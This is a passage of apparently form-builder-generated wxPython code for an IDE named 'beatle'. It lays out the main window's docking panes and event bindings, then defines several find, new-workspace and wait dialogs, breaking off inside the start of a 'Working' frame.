        self.m_mgr.AddPane( self.viewBook, wx.aui.AuiPaneInfo() .Name( u"views" ).Left() .Caption( u"views" ).CaptionVisible( False ).MaximizeButton( True ).MinimizeButton( True ).PinButton( True ).PaneBorder( False ).Dock().Resizable().FloatingSize( wx.Size( 120,300 ) ).Row( 1 ).Position( 0 ).Layer( 4 ) )

        self.docBook = wxx.AuiNotebook( self, wx.ID_ANY, wx.DefaultPosition, wx.Size( -1,-1 ), wx.aui.AUI_NB_CLOSE_ON_ACTIVE_TAB|wx.aui.AUI_NB_SCROLL_BUTTONS|wx.aui.AUI_NB_TAB_EXTERNAL_MOVE|wx.aui.AUI_NB_TAB_MOVE|wx.aui.AUI_NB_TAB_SPLIT|wx.aui.AUI_NB_TOP|wx.aui.AUI_NB_WINDOWLIST_BUTTON|wx.FULL_REPAINT_ON_RESIZE|wx.NO_BORDER )
        self.m_mgr.AddPane( self.docBook,
wx.aui.AuiPaneInfo() .Name( u"editors" ).Center() .Caption( u"editors" ).CaptionVisible( False ).CloseButton( False ).MaximizeButton( True ).PinButton( True ).PaneBorder( False ).Dock().Resizable().FloatingSize( wx.Size( 120,300 ) ).DockFixed( True ).Row( 0 ).Layer( 0 ) )

        # --- auxiliary panes: console / log / output / search -----------------
        self.m_aux_panes = wx.Listbook( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LB_TOP|wx.NO_BORDER )
        self.m_mgr.AddPane( self.m_aux_panes, wx.aui.AuiPaneInfo() .Name( u"auxiliar" ).Bottom() .Caption( u"auxiliar panes" ).CaptionVisible( False ).MaximizeButton( True ).MinimizeButton( True ).PinButton( True ).PaneBorder( False ).Dock().Resizable().FloatingSize( wx.Size( -1,-1 ) ).Row( 1 ).MinSize( wx.Size( 200,150 ) ).Layer( 2 ) )

        # console page
        self.m_panel37 = wx.Panel( self.m_aux_panes, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
        fgSizer159 = wx.FlexGridSizer( 1, 1, 0, 0 )
        fgSizer159.AddGrowableCol( 0 )
        fgSizer159.AddGrowableRow( 0 )
        fgSizer159.SetFlexibleDirection( wx.BOTH )
        fgSizer159.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )

        # python console entry is a project-local control
        from beatle.app.ui.ctrl import pythonTextEntry
        self.m_pythonEntry = pythonTextEntry(self.m_panel37)
        fgSizer159.Add( self.m_pythonEntry, 1, wx.ALL|wx.EXPAND, 5 )

        self.m_panel37.SetSizer( fgSizer159 )
        self.m_panel37.Layout()
        fgSizer159.Fit( self.m_panel37 )
        self.m_aux_panes.AddPage( self.m_panel37, u"console", True )

        # log page
        self.m_panel30 = wx.Panel( self.m_aux_panes, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
        fgSizer243 = wx.FlexGridSizer( 1, 1, 0, 0 )
        fgSizer243.AddGrowableCol( 0 )
        fgSizer243.AddGrowableRow( 0 )
        fgSizer243.SetFlexibleDirection( wx.BOTH )
        fgSizer243.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )

        self.m_toolLog = wx.TextCtrl( self.m_panel30, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_MULTILINE|wx.TE_READONLY )
        fgSizer243.Add( self.m_toolLog, 0, wx.ALL|wx.EXPAND, 5 )

        self.m_panel30.SetSizer( fgSizer243 )
        self.m_panel30.Layout()
        fgSizer243.Fit( self.m_panel30 )
        self.m_aux_panes.AddPage( self.m_panel30, u"log", False )

        # output page
        self.m_aux_output_pane = wx.Panel( self.m_aux_panes, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
        fgSizer2431 = wx.FlexGridSizer( 1, 1, 0, 0 )
        fgSizer2431.AddGrowableCol( 0 )
        fgSizer2431.AddGrowableRow( 0 )
        fgSizer2431.SetFlexibleDirection( wx.BOTH )
        fgSizer2431.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )

        self.auxOutput = wx.TextCtrl( self.m_aux_output_pane, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_CHARWRAP|wx.TE_MULTILINE|wx.TE_READONLY )
        fgSizer2431.Add( self.auxOutput, 0, wx.ALL|wx.EXPAND, 5 )

        self.m_aux_output_pane.SetSizer( fgSizer2431 )
        self.m_aux_output_pane.Layout()
        fgSizer2431.Fit( self.m_aux_output_pane )
        self.m_aux_panes.AddPage( self.m_aux_output_pane, u"output", False )

        # search-results page
        self.m_searchPane = wx.Panel( self.m_aux_panes, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
        fgSizer53 = wx.FlexGridSizer( 1, 1, 0, 0 )
        fgSizer53.AddGrowableCol( 0 )
        fgSizer53.AddGrowableRow( 0 )
        fgSizer53.SetFlexibleDirection( wx.BOTH )
        fgSizer53.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )

        self.m_searchList = wx.ListCtrl( self.m_searchPane, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LC_REPORT|wx.LC_SINGLE_SEL )
        fgSizer53.Add( self.m_searchList, 0, wx.ALL|wx.EXPAND, 5 )

        self.m_searchPane.SetSizer( fgSizer53 )
        self.m_searchPane.Layout()
        fgSizer53.Fit( self.m_searchPane )
        self.m_aux_panes.AddPage( self.m_searchPane, u"search", False )

        self.m_mgr.Update()
        self.Centre( wx.BOTH )

        # Connect Events
        self.Bind( wx.EVT_CLOSE, self.OnSalir )
        self.Bind( wx.EVT_MENU, self.OnNewWorkspace, id = self.newWorkspace.GetId() )
        self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.newProject.GetId() )
        self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.newProject.GetId() )
        self.Bind( wx.EVT_MENU, self.OnOpenWorkspace, id = self.openWorkspace.GetId() )
        self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.openProject.GetId() )
        self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.openProject.GetId() )
        self.Bind( wx.EVT_MENU, self.OnCloseWorkspace, id = self.m_menuItem26.GetId() )
        self.Bind( wx.EVT_UPDATE_UI, self.OnUpdateCloseWorkspace, id = self.m_menuItem26.GetId() )
        self.Bind( wx.EVT_MENU, self.OnCloseProject, id = self.m_menuItem27.GetId() )
        self.Bind( wx.EVT_UPDATE_UI, self.OnUpdateCloseProject, id = self.m_menuItem27.GetId() )
        self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.importProject.GetId() )
        self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.importProject.GetId() )
        self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.saveWorkspace.GetId() )
        self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.saveWorkspace.GetId() )
        self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.saveProject.GetId() )
        self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.saveProject.GetId() )
        self.Bind( wx.EVT_MENU, self.OnSalir, id = self.quit.GetId() )
        self.Bind( wx.EVT_MENU, self.OnEditUndo, id = self.undo.GetId() )
        self.Bind( wx.EVT_UPDATE_UI, self.OnUpdateEditUndo, id = self.undo.GetId() )
        self.Bind( wx.EVT_MENU, self.OnEditRedo, id = self.redo.GetId() )
        self.Bind( wx.EVT_UPDATE_UI, self.OnUpdateEditRedo, id = self.redo.GetId() )
        self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.copy.GetId() )
        self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.copy.GetId() )
        self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.cut.GetId() )
        self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.cut.GetId() )
        self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.paste.GetId() )
        self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.paste.GetId() )
        self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.delete.GetId() )
        self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.delete.GetId() )
        self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.editOpen.GetId() )
        self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.editOpen.GetId() )
        self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.editContext.GetId() )
        self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.editContext.GetId() )
        self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.editUserSections.GetId() )
        self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.editUserSections.GetId() )
        self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.editProperties.GetId() )
        self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.editProperties.GetId() )
        self.Bind( wx.EVT_MENU, self.OnEditPreferences, id = self.preferences.GetId() )
        self.Bind( wx.EVT_MENU, self.OnFindInFiles, id = self.findInFiles.GetId() )
        self.Bind( wx.EVT_MENU, self.OnResetPerpective, id = self.m_menuItem72.GetId() )
        self.Bind( wx.EVT_MENU, self.OnToggleViewsPanes, id = self.m_views.GetId() )
        self.Bind( wx.EVT_UPDATE_UI, self.OnUpdateToggleViewsPanes, id = self.m_views.GetId() )
        self.Bind( wx.EVT_MENU, self.OnToggleAuxiliarPanes, id = self.m_auxiliarPanes.GetId() )
        self.Bind( wx.EVT_UPDATE_UI, self.OnUpdateToggleAuxiliarPanes, id = self.m_auxiliarPanes.GetId() )
        self.Bind( wx.EVT_MENU, self.OnSettingsBuildTools, id = self.compilerSettings.GetId() )
        self.viewBook.Bind( wx.aui.EVT_AUINOTEBOOK_PAGE_CHANGED, self.OnViewPageChanged )
        self.viewBook.Bind( wx.aui.EVT_AUINOTEBOOK_PAGE_CHANGING, self.OnViewPageChanging )
        self.viewBook.Bind( wx.aui.EVT_AUINOTEBOOK_PAGE_CLOSE, self.OnViewPageClosed )
        self.docBook.Bind( wx.aui.EVT_AUINOTEBOOK_PAGE_CHANGED, self.OnPageChanged )
        self.docBook.Bind( wx.aui.EVT_AUINOTEBOOK_PAGE_CHANGING, self.OnPageChanging )
        self.docBook.Bind( wx.aui.EVT_AUINOTEBOOK_PAGE_CLOSE, self.OnClosePane )
        self.m_searchList.Bind( wx.EVT_LIST_ITEM_SELECTED, self.OnSelectSearchItem )

    def __del__( self ):
        # detach the AUI manager before the frame goes away
        self.m_mgr.UnInit()

    # Virtual event handlers, override them in your derived class
    def OnSalir( self, event ):
        event.Skip()

    def OnNewWorkspace( self, event ):
        event.Skip()

    def redirectedToFocus( self, event ):
        event.Skip()

    def redirectedToFocus4Enabled( self, event ):
        event.Skip()

    def OnOpenWorkspace( self, event ):
        event.Skip()

    def OnCloseWorkspace( self, event ):
        event.Skip()

    def OnUpdateCloseWorkspace( self, event ):
        event.Skip()

    def OnCloseProject( self, event ):
        event.Skip()

    def OnUpdateCloseProject( self, event ):
        event.Skip()

    def OnEditUndo( self, event ):
        event.Skip()

    def OnUpdateEditUndo( self, event ):
        event.Skip()

    def OnEditRedo( self, event ):
        event.Skip()

    def OnUpdateEditRedo( self, event ):
        event.Skip()

    def OnEditPreferences( self, event ):
        event.Skip()

    def OnFindInFiles( self, event ):
        event.Skip()

    def OnResetPerpective( self, event ):
        event.Skip()

    def OnToggleViewsPanes( self, event ):
        event.Skip()

    def OnUpdateToggleViewsPanes( self, event ):
        event.Skip()

    def OnToggleAuxiliarPanes( self, event ):
        event.Skip()

    def OnUpdateToggleAuxiliarPanes( self, event ):
        event.Skip()

    def OnSettingsBuildTools( self, event ):
        event.Skip()

    def OnViewPageChanged( self, event ):
        event.Skip()

    def OnViewPageChanging( self, event ):
        event.Skip()

    def OnViewPageClosed( self, event ):
        event.Skip()

    def OnPageChanged( self, event ):
        event.Skip()

    def OnPageChanging( self, event ):
        event.Skip()

    def OnClosePane( self, event ):
        event.Skip()

    def OnSelectSearchItem( self, event ):
        event.Skip()


###########################################################################
## Class FindText
###########################################################################

class FindText ( wx.Dialog ):
    # Simple "Find" dialog: one search string plus tip/OK/Cancel buttons.

    def __init__( self, parent ):
        wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"Find ", pos = wx.DefaultPosition, size = wx.Size( 331,118 ), style = wx.DEFAULT_DIALOG_STYLE )

        self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize )

        fgSizer68 = wx.FlexGridSizer( 4, 1, 0, 0 )
        fgSizer68.AddGrowableCol( 0 )
        fgSizer68.AddGrowableRow( 0 )
        fgSizer68.AddGrowableRow( 2 )
        fgSizer68.SetFlexibleDirection( wx.BOTH )
        fgSizer68.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )

        fgSizer68.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 )

        fgSizer70 = wx.FlexGridSizer( 1, 2, 0, 0 )
        fgSizer70.AddGrowableCol( 1 )
        fgSizer70.AddGrowableRow( 0 )
        fgSizer70.SetFlexibleDirection( wx.BOTH )
        fgSizer70.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )

        self.m_staticText34 = wx.StaticText( self, wx.ID_ANY, u"search:", wx.DefaultPosition, wx.DefaultSize, 0 )
        self.m_staticText34.Wrap( -1 )
        fgSizer70.Add( self.m_staticText34, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 5 )

        # TE_PROCESS_ENTER: pressing Enter fires OnOK (bound below)
        self.m_search_string = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_PROCESS_ENTER )
        fgSizer70.Add( self.m_search_string, 0, wx.ALL|wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, 5 )

        fgSizer68.Add( fgSizer70, 1, wx.EXPAND|wx.RIGHT|wx.LEFT, 5 )

        fgSizer68.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 )

        fgSizer159 = wx.FlexGridSizer( 1, 2, 0, 0 )
        fgSizer159.AddGrowableCol( 1 )
        fgSizer159.SetFlexibleDirection( wx.BOTH )
        fgSizer159.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )

        self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|wx.NO_BORDER )
        fgSizer159.Add( self.m_info, 0, wx.ALL, 5 )

        m_sdbSizer12 = wx.StdDialogButtonSizer()
        self.m_sdbSizer12OK = wx.Button( self, wx.ID_OK )
        m_sdbSizer12.AddButton( self.m_sdbSizer12OK )
        self.m_sdbSizer12Cancel = wx.Button( self, wx.ID_CANCEL )
        m_sdbSizer12.AddButton( self.m_sdbSizer12Cancel )
        m_sdbSizer12.Realize();
        fgSizer159.Add( m_sdbSizer12, 1, wx.EXPAND, 5 )

        fgSizer68.Add( fgSizer159, 1, wx.EXPAND, 5 )

        self.SetSizer( fgSizer68 )
        self.Layout()

        self.Centre( wx.BOTH )

        # Connect Events
        self.m_search_string.Bind( wx.EVT_TEXT_ENTER, self.OnOK )
        self.m_sdbSizer12Cancel.Bind( wx.EVT_BUTTON, self.OnCancel )
        self.m_sdbSizer12OK.Bind( wx.EVT_BUTTON, self.OnOK )

    def __del__( self ):
        pass

    # Virtual event handlers, override them in your derived class
    def OnOK( self, event ):
        event.Skip()

    def OnCancel( self, event ):
        event.Skip()


###########################################################################
## Class FindInFiles
###########################################################################

class FindInFiles ( wx.Dialog ):
    # "Find in files" dialog: search string, match options (case / regex)
    # and search-scope radio buttons (open / project / workspace files).

    def __init__( self, parent ):
        wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"Find in files", pos = wx.DefaultPosition, size = wx.Size( 436,256 ), style = wx.DEFAULT_DIALOG_STYLE )

        self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize )

        fgSizer68 = wx.FlexGridSizer( 4, 1, 0, 0 )
        fgSizer68.AddGrowableCol( 0 )
        fgSizer68.AddGrowableRow( 1 )
        fgSizer68.SetFlexibleDirection( wx.BOTH )
        fgSizer68.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )

        fgSizer70 = wx.FlexGridSizer( 1, 2, 0, 0 )
        fgSizer70.AddGrowableCol( 1 )
        fgSizer70.AddGrowableRow( 0 )
        fgSizer70.SetFlexibleDirection( wx.BOTH )
        fgSizer70.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )

        self.m_staticText34 = wx.StaticText( self, wx.ID_ANY, u"search:", wx.DefaultPosition, wx.DefaultSize, 0 )
        self.m_staticText34.Wrap( -1 )
        fgSizer70.Add( self.m_staticText34, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 5 )

        # TE_PROCESS_ENTER: pressing Enter fires OnOK (bound below)
        self.m_search_string = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_PROCESS_ENTER )
        fgSizer70.Add( self.m_search_string, 0, wx.ALL|wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, 5 )

        fgSizer68.Add( fgSizer70, 1, wx.EXPAND|wx.TOP|wx.RIGHT|wx.LEFT, 5 )

        fgSizer61 = wx.FlexGridSizer( 1, 2, 0, 0 )
        fgSizer61.AddGrowableCol( 0 )
        fgSizer61.AddGrowableCol( 1 )
        fgSizer61.AddGrowableRow( 0 )
        fgSizer61.SetFlexibleDirection( wx.BOTH )
        fgSizer61.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )

        # match options
        sbSizer6 = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u"options" ), wx.VERTICAL )
        self.m_checkBox4 = wx.CheckBox( sbSizer6.GetStaticBox(), wx.ID_ANY, u"&match case", wx.DefaultPosition, wx.DefaultSize, 0 )
        sbSizer6.Add( self.m_checkBox4, 0, wx.ALL, 5 )

        self.m_checkBox5 = wx.CheckBox( sbSizer6.GetStaticBox(), wx.ID_ANY, u"regular expression", wx.DefaultPosition, wx.DefaultSize, 0 )
        sbSizer6.Add( self.m_checkBox5, 0, wx.ALL, 5 )

        fgSizer61.Add( sbSizer6, 1, wx.EXPAND, 5 )

        # search scope
        sbSizer7 = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u"scope" ), wx.VERTICAL )
        self.m_radioBtn1 = wx.RadioButton( sbSizer7.GetStaticBox(), wx.ID_ANY, u"open files", wx.DefaultPosition, wx.DefaultSize, 0 )
        sbSizer7.Add( self.m_radioBtn1, 0, wx.ALL, 5 )

        self.m_radioBtn2 = wx.RadioButton( sbSizer7.GetStaticBox(), wx.ID_ANY, u"project files", wx.DefaultPosition, wx.DefaultSize, 0 )
        sbSizer7.Add( self.m_radioBtn2, 0, wx.ALL, 5 )

        self.m_radioBtn3 = wx.RadioButton( sbSizer7.GetStaticBox(), wx.ID_ANY, u"workspace files", wx.DefaultPosition, wx.DefaultSize, 0 )
        sbSizer7.Add( self.m_radioBtn3, 0, wx.ALL, 5 )

        fgSizer61.Add( sbSizer7, 1, wx.EXPAND, 5 )

        fgSizer68.Add( fgSizer61, 1, wx.EXPAND|wx.ALL, 5 )

        fgSizer159 = wx.FlexGridSizer( 1, 2, 0, 0 )
        fgSizer159.AddGrowableCol( 1 )
        fgSizer159.SetFlexibleDirection( wx.BOTH )
        fgSizer159.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )

        self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|wx.NO_BORDER )
        fgSizer159.Add( self.m_info, 0, wx.ALL, 5 )

        m_sdbSizer12 = wx.StdDialogButtonSizer()
        self.m_sdbSizer12OK = wx.Button( self, wx.ID_OK )
        m_sdbSizer12.AddButton( self.m_sdbSizer12OK )
        self.m_sdbSizer12Cancel = wx.Button( self, wx.ID_CANCEL )
        m_sdbSizer12.AddButton( self.m_sdbSizer12Cancel )
        m_sdbSizer12.Realize();
        fgSizer159.Add( m_sdbSizer12, 1, wx.EXPAND, 5 )

        fgSizer68.Add( fgSizer159, 1, wx.EXPAND, 5 )

        self.SetSizer( fgSizer68 )
        self.Layout()

        self.Centre( wx.BOTH )

        # Connect Events
        self.m_search_string.Bind( wx.EVT_TEXT_ENTER, self.OnOK )
        self.m_sdbSizer12Cancel.Bind( wx.EVT_BUTTON, self.OnCancel )
        self.m_sdbSizer12OK.Bind( wx.EVT_BUTTON, self.OnOK )

    def __del__( self ):
        pass

    # Virtual event handlers, override them in your derived class
    def OnOK( self, event ):
        event.Skip()

    def OnCancel( self, event
): event.Skip()


###########################################################################
## Class NewWorkspace
###########################################################################

class NewWorkspace ( wx.Dialog ):
    # "New workspace" dialog: workspace name, base-directory chooser and a
    # rich-text documentation box.

    def __init__( self, parent ):
        wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"New workspace", pos = wx.DefaultPosition, size = wx.Size( 429,401 ), style = wx.DEFAULT_DIALOG_STYLE )

        self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize )

        fgSizer172 = wx.FlexGridSizer( 3, 1, 0, 0 )
        fgSizer172.AddGrowableCol( 0 )
        fgSizer172.AddGrowableRow( 1 )
        fgSizer172.SetFlexibleDirection( wx.BOTH )
        fgSizer172.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )

        fgSizer5 = wx.FlexGridSizer( 5, 2, 0, 0 )
        fgSizer5.AddGrowableCol( 1 )
        fgSizer5.SetFlexibleDirection( wx.BOTH )
        fgSizer5.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )

        self.m_staticText2 = wx.StaticText( self, wx.ID_ANY, u"Name:", wx.DefaultPosition, wx.DefaultSize, 0 )
        self.m_staticText2.Wrap( -1 )
        fgSizer5.Add( self.m_staticText2, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 )

        self.m_textCtrl1 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 )
        fgSizer5.Add( self.m_textCtrl1, 0, wx.ALL|wx.EXPAND, 5 )

        self.m_staticText3 = wx.StaticText( self, wx.ID_ANY, u"Base directory:", wx.DefaultPosition, wx.DefaultSize, 0 )
        self.m_staticText3.Wrap( -1 )
        fgSizer5.Add( self.m_staticText3, 0, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 )

        # directory text field with a folder-picker button
        fgSizer29 = wx.FlexGridSizer( 1, 2, 0, 0 )
        fgSizer29.AddGrowableCol( 0 )
        fgSizer29.SetFlexibleDirection( wx.BOTH )
        fgSizer29.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )

        self.m_textCtrl9 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 )
        fgSizer29.Add( self.m_textCtrl9, 0, wx.ALL|wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, 5 )

        self.m_bpButton3 = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_FOLDER_OPEN, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW )
        fgSizer29.Add( self.m_bpButton3, 0, wx.ALL, 5 )

        fgSizer5.Add( fgSizer29, 1, wx.EXPAND, 5 )

        fgSizer172.Add( fgSizer5, 1, wx.EXPAND, 5 )

        sbSizer9 = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u"Documentation" ), wx.VERTICAL )
        self.m_richText3 = wx.richtext.RichTextCtrl( sbSizer9.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.HSCROLL|wx.SUNKEN_BORDER|wx.VSCROLL|wx.WANTS_CHARS )
        sbSizer9.Add( self.m_richText3, 1, wx.EXPAND|wx.ALL, 5 )

        fgSizer172.Add( sbSizer9, 1, wx.EXPAND, 5 )

        fgSizer22 = wx.FlexGridSizer( 1, 3, 0, 0 )
        fgSizer22.AddGrowableCol( 0 )
        fgSizer22.SetFlexibleDirection( wx.BOTH )
        fgSizer22.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )

        self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|wx.NO_BORDER )
        fgSizer22.Add( self.m_info, 0, wx.ALL, 5 )

        self.m_button5 = wx.Button( self, wx.ID_CANCEL, u"Cancel", wx.DefaultPosition, wx.DefaultSize, 0 )
        fgSizer22.Add( self.m_button5, 0, wx.ALL, 5 )

        self.m_button6 = wx.Button( self, wx.ID_OK, u"Ok", wx.DefaultPosition, wx.DefaultSize, 0 )
        self.m_button6.SetDefault()
        fgSizer22.Add( self.m_button6, 0, wx.ALL, 5 )

        fgSizer172.Add( fgSizer22, 1, wx.EXPAND, 5 )

        self.SetSizer( fgSizer172 )
        self.Layout()

        self.Centre( wx.BOTH )

        # Connect Events
        self.m_textCtrl1.Bind( wx.EVT_TEXT, self.OnChangeWorkspaceName )
        self.m_bpButton3.Bind( wx.EVT_BUTTON, self.OnChooseDir )
        self.m_button6.Bind( wx.EVT_BUTTON, self.OnOK )

    def __del__( self ):
        pass

    # Virtual event handlers, override them in your derived class
    def OnChangeWorkspaceName( self, event ):
        event.Skip()

    def OnChooseDir( self, event ):
        event.Skip()

    def OnOK( self, event ):
        event.Skip()


###########################################################################
## Class Wait
###########################################################################

class Wait ( wx.Dialog ):
    # "Please wait" banner shown while files are processed; the centered
    # read-only text control (m_text) carries the progress message.

    def __init__( self, parent ):
        wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"Please wait while processing files", pos = wx.DefaultPosition, size = wx.Size( 553,186 ), style = wx.CAPTION|wx.RESIZE_BORDER|wx.STAY_ON_TOP )

        self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize )
        # keep idle and UI-update events flowing while the dialog is shown
        self.SetExtraStyle( self.GetExtraStyle() | wx.WS_EX_PROCESS_IDLE|wx.WS_EX_PROCESS_UI_UPDATES )

        fgSizer224 = wx.FlexGridSizer( 3, 1, 0, 0 )
        fgSizer224.AddGrowableCol( 0 )
        fgSizer224.AddGrowableRow( 0 )
        fgSizer224.AddGrowableRow( 2 )
        fgSizer224.SetFlexibleDirection( wx.BOTH )
        fgSizer224.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )

        fgSizer224.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 )

        fgSizer225 = wx.FlexGridSizer( 1, 3, 0, 0 )
        fgSizer225.AddGrowableCol( 1 )
        fgSizer225.SetFlexibleDirection( wx.BOTH )
        fgSizer225.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )

        fgSizer225.AddSpacer( ( 10, 0), 1, wx.EXPAND, 5 )

        self.m_text = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_READONLY|wx.NO_BORDER )
        self.m_text.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOWFRAME ) )
        fgSizer225.Add( self.m_text, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_CENTER_HORIZONTAL|wx.EXPAND, 5 )

        fgSizer225.AddSpacer( ( 10, 0), 1, wx.EXPAND, 5 )

        fgSizer224.Add( fgSizer225, 1, wx.EXPAND, 5 )

        fgSizer224.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 )

        self.SetSizer( fgSizer224 )
        self.Layout()

        self.Centre( wx.BOTH )

    def __del__( self ):
        pass


###########################################################################
## Class Working
###########################################################################

class Working ( wx.Frame ):
    # NOTE(review): this class continues past the end of this chunk; only
    # the beginning of its __init__ is visible here.

    def __init__( self, parent ):
        wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = wx.EmptyString, pos = wx.DefaultPosition, size = wx.Size( 236,171 ), style = wx.FRAME_FLOAT_ON_PARENT|wx.FRAME_NO_TASKBAR )

        self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize )

        fgSizer242 = wx.FlexGridSizer( 3, 1, 0, 0 )
        fgSizer242.AddGrowableCol( 0 )
